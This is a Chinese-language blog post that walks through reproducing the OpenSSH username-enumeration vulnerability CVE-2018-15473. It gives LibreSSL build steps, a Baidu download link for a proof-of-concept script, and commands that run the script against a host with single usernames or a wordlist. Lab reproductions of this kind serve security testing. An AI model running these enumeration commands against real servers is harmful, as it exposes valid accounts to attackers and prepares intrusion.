WEB渗透与网络安全

CVE-2018-15473漏洞复现

2020-09-11  本文已影响0人  YPL8

OpenSSH 用户枚举漏洞(CVE-2018-15473)

详细描述

OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。

利用环境

描述:OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。攻击者可通过发送特制的请求利用该漏洞枚举用户名称。
攻击机:CentOS-6.8、libreSSL-2.7.4、python3

安装依赖包

需要安装libreSSL,python3可以加载ssl,无需再次安装
1、libreSSL-2.7.4安装

下载地址:https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/
tar -zxvf libreSSL-2.7.4.tar.gz
cd libreSSL-2.7.4
./config –prefix=/usr/local/lib
make
make install
cd /etc/ld.so.conf.d
#新建文件:
vi libressl-2.7.4.conf 
#将libssl库安装路径/usr/local/lib加入文件 libressl-2.7.4.conf
/usr/local/lib
#重新加载库文件
ldconfig -v  
image.png

2、查看是否安装成功

openssl version
image.png

漏洞验证脚本下载

链接:https://pan.baidu.com/s/1g83Ln-uHOqTK032UrQevrw   提取码:2506 

1、安装脚本依赖包

cd cve-2018-15473-master  
pip3 install -r requirements.txt
chmod u+x ssh-username-enum.py
image.png

2、验证方法

#单个用户验证
python3 ssh-username-enum.py -u 用户 host
image.png
#多个用户验证
python3 ssh-username-enum.py -6 -p 22 -v -w 用户列表 host
image.png
上一篇下一篇

猜你喜欢

热点阅读